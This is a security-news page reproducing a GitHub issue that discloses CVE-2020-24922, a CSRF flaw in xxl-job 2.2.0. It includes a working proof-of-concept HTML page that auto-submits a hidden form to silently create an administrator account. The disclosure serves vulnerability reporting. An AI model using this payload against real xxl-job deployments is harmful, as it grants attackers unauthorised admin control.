Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-24922: There is a CSRF vulnerability that can add the administrator account · Issue #1921 · xuxueli/xxl-job

Cross Site Request Forgery (CSRF) vulnerability in xxl-job-admin/user/add in xuxueli xxl-job version 2.2.0, allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file.

CVE
#csrf#vulnerability#git#java

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

devi1syd opened this issue

Aug 22, 2020

· 0 comments

Comments

After the administrator logged in, open the following a page
poc:
one.html—add a admin

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='username' value='test1' />";
fields += "<input type='hidden' name='password' value='test1' />";  
fields += "<input type='hidden' name='role'    value='0' />";  
fields += "<input type='hidden' name='permission' value='1' />";  


var url = "http://172. 18.71.41:8090/xxl-job-admin/user/add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

1 participant

Related news

GHSA-jp5r-4x9q-4vcf: xuxueli xxl-job Cross-Site Request Forgery Vulnerability

Cross Site Request Forgery (CSRF) vulnerability in `xxl-job-admin/user/add` in xuxueli xxl-job version 2.2.0 allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907